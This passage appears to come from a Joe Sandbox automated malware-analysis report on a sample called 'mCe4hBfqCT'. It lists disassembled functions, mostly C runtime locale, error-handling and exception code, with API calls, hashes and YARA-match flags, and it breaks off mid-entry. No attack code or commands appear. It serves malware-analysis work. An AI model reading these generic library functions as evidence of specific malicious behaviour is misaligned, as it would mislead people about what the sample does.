                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                  • Instruction ID: 30efa2db2ebc421b8eb16f6be3d9c1d2f9248bf7c7b318aeffa685f0bbb35bb2
                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                  • Instruction Fuzzy Hash: 6321D6B2602104ABEB70CF54C901A97BBEAEF44E14B4E84B4E989D7100FB32DF60C350
                                                  Function 0043B962 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 2287132625-0
                                                  • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                  • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                  • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                  • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                  Function 0304BBC9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 030421C0
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421CD
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0304BCD5
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0304BD30
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0304BD3F
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,03040A3C,00000040,?,03040B5C,00000055,00000000,?,?,00000055,00000000), ref: 0304BD87
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,03040ABC,00000040), ref: 0304BDA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 2287132625-0
                                                  • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                  • Instruction ID: 9800e2653d3d7b79a711be645c873d727aeff6bd65707f66d184c1fd1d7ee460
                                                  • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                  • Instruction Fuzzy Hash: 175171B5A01205EBDB50DFA9DC81ABEB7B8BF55700F088479E944EB190EB71DB048B61
                                                  Function 0043B02A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                  • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                  • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                  • String ID:
                                                  • API String ID: 2444527052-0
                                                  • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                  • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                  • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                  • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                  Function 0304B291 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,03040A43,?,?,?,?,0304049A,?,00000004), ref: 0304B373
                                                  • _wcschr.LIBVCRUNTIME ref: 0304B403
                                                  • _wcschr.LIBVCRUNTIME ref: 0304B411
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,03040A43,00000000,03040B63), ref: 0304B4B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                  • String ID:
                                                  • API String ID: 2444527052-0
                                                  • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                  • Instruction ID: daf9a4b69e32b99a1fca4d2cbcd848c2dd45511307390150febb7266d4eaf21d
                                                  • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                  • Instruction Fuzzy Hash: C36105F5602306AADB24EB35DC41BBBB3ECEF84700F184479E985CB580EA70E74187A1
                                                  Function 004351E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: 11@$GetLocaleInfoEx
                                                  • API String ID: 2299586839-1075713910
                                                  • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                  • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                  • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                  • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                  Function 0043B415 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B469
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4BA
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B57A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free
                                                  • String ID:
                                                  • API String ID: 2834031935-0
                                                  • Opcode ID: f153121c08e24ac243ec409ba6aebefbe294cb333e2e14397e380fa81c54f75c
                                                  • Instruction ID: c275762dc3584603e4449795e293da263c651eeb99c2a8a82852c084b1b0f28d
                                                  • Opcode Fuzzy Hash: f153121c08e24ac243ec409ba6aebefbe294cb333e2e14397e380fa81c54f75c
                                                  • Instruction Fuzzy Hash: CA61B271900617AFDB289F25CC82BBA77A8EF18314F20517BEE05C6681E73DD951CB98
                                                  Function 0042A3F3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                  • Instruction ID: 9c884317c51d85a4b2a5569c8d07c46b6125cba9f3fa022ce0985413e040e42f
                                                  • Opcode Fuzzy Hash: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                  • Instruction Fuzzy Hash: 6D31D474901228ABCB21DF24D8887DDBBB8BF08710F5041EAE81CA7251EB749F958F49
                                                  Function 0303A65A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0301DAFC), ref: 0303A752
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0301DAFC), ref: 0303A75C
                                                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0301DAFC), ref: 0303A769
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                  • Instruction ID: 5449373988b9d9abe5e02e44d823e020e4429b7e9a4576c2bd9eef495a4cb2cf
                                                  • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                  • Instruction Fuzzy Hash: 2731C47490132CABCB61DF64DC887C9BBB8AF09710F5041EAE41CA7250E7749B858F44
                                                  Function 0042FE7F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA0
                                                  • TerminateProcess.KERNEL32(00000000,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA7
                                                  • ExitProcess.KERNEL32 ref: 0042FEB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                  • Instruction ID: f37ed9c2097ef164d49cac6b9283d1ec131115afdbcb09f205e89e36e121774d
                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                  • Instruction Fuzzy Hash: BCE08C31100158AFCF126F50EE08A4A3B39FF46B56F810439F9068B236CB39EE42CB48
                                                  Function 030400E6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,?,030400BC,00000000,00457970,0000000C,03040213,00000000,00000002,00000000), ref: 03040107
                                                  • TerminateProcess.KERNEL32(00000000,?,030400BC,00000000,00457970,0000000C,03040213,00000000,00000002,00000000), ref: 0304010E
                                                  • ExitProcess.KERNEL32 ref: 03040120
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                  • Instruction ID: c896ba8a82b04e095c0308b2e38cba07fe51d0fc76afce6eaf68900d21e19615
                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                  • Instruction Fuzzy Hash: 3AE0B675002648ABCF15AF58DD09A99BBA9EB4AE42B044474FA059B131CB36DA42CA94
                                                  Function 0301092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction ID: 996e27a8f9e8385e911204bc37044d4a8e9ecd878c15e3395cbdd57bed5f54fb
                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction Fuzzy Hash: 5C313AB6911609DFDB10CF99C880AAEBBF9FF48324F15408AD441AB310D771EA95CBA4
                                                  Function 00438A12 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-2043925204
                                                  • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                  • Instruction ID: a227ec02499bfe1bfd98fe0f4147e6b501038b1cbe903e33c1bef616cbd9e7fb
                                                  • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                  • Instruction Fuzzy Hash: 48412A725003196ECB20EFB9DC49DABB778EB88714F10426EF905D7280EA34AD41CB58
                                                  Function 03048C79 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-2043925204
                                                  • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                  • Instruction ID: 92645c9619516a0bbe4b5679a79c5eeb6782df385b765b3d558ac17ef2da991f
                                                  • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                  • Instruction Fuzzy Hash: 864118B6502219AECB24DF79DC48EAB77FCEB81710F1486B9F905DB180E6729E418B50
                                                  Function 03045447 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0304049A,?,00000004), ref: 0304549A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: 11@
                                                  • API String ID: 2299586839-1785270423
                                                  • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                  • Instruction ID: 028f3a563b7f5b2b9acc01a69e8e67d37c405dea8ff6997b555cd5dd31392538
                                                  • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                  • Instruction Fuzzy Hash: 8BF02B35681318BFDB01EF60DC01FAE7B61EF45B12F004165FD066B1A0DA718E20A699
                                                  Function 0042EB00 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                  • Instruction ID: 4ac827831b60bfe85137482c2a27181e9cc595fbcc224352d04797812a560731
                                                  • Opcode Fuzzy Hash: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                  • Instruction Fuzzy Hash: 74024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AE819E7384D734AD41CB84
                                                  Function 0303ED67 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                  • Instruction ID: a894c32fc8e6d88c8dd95819ff8904c16c6d5ce7f2c2f1e4f43f0389589c8690
                                                  • Opcode Fuzzy Hash: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                  • Instruction Fuzzy Hash: EA022D72E012199FDF14CFADD8806ADFBF5EF89314F198269D819E7244D731A941CB90
                                                  Function 03012621 Relevance: 3.1, APIs: 2, Instructions: 129nativewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 03012648
                                                  • PostQuitMessage.USER32(00000000), ref: 030127EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageNtdllPostProc_QuitWindow
                                                  • String ID:
                                                  • API String ID: 4264772764-0
                                                  • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                  • Instruction ID: 7292fbf64b5154aa29caa2178fb78a30d98cf53bff50cc5ec3d1a5c2e23cd4e1
                                                  • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                  • Instruction Fuzzy Hash: 7B411E15A65384A4E730EFA5FC15B2637B4FF64762F14253BE528CB2B2E3A18550C70E
                                                  Function 00436CDF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CDA,?,?,00000008,?,?,0043F19B,00000000), ref: 00436F0C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                  • Instruction ID: 56894988d221dc275bbeb5d863802b50bab2a0c2ec5e1dae9116b4c396cbcd5f
                                                  • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                  • Instruction Fuzzy Hash: 58B15D3521060AAFD715CF28C48AB657BE0FF09364F26D659E899CF3A1C339D992CB44
                                                  Function 03046F46 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,03046F41,?,?,00000008,?,?,0304F402,00000000), ref: 03047173
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                  • Instruction ID: 85060cc67bcbee825137489af3ec5dea99ece715163d682a5a17ef96f04b4d7f
                                                  • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                  • Instruction Fuzzy Hash: 3DB14EB1511608DFD755CF2CC486B65BBE0FF45364F2986A8E8A9CF2A1C336DA91CB40
                                                  Function 0043B665 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6B9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2955987475-0
                                                  • Opcode ID: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
                                                  • Instruction ID: b1e829de63a4cfdbbeb590434fbc272015d29a09e68feb3eb70f55beb1ad3412
                                                  • Opcode Fuzzy Hash: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
                                                  • Instruction Fuzzy Hash: 5921B33291020A9BDB249E25CC42BBB73A8EF48314F10217BFE01DA241EB399D45CB99
                                                  Function 0304B8CC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 030421C0
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421CD
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0304B920
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2955987475-0
                                                  • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                  • Instruction ID: 7b02b09028638fba28520cfbeebc6077024168ef68c4fa91855b8425436a69d3
                                                  • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                  • Instruction Fuzzy Hash: 8E2183B651220AABDB24EE25DC41BBA73ECEF45710F1441BAED41CA140EB75DE54CB50
                                                  Function 0043B2ED Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
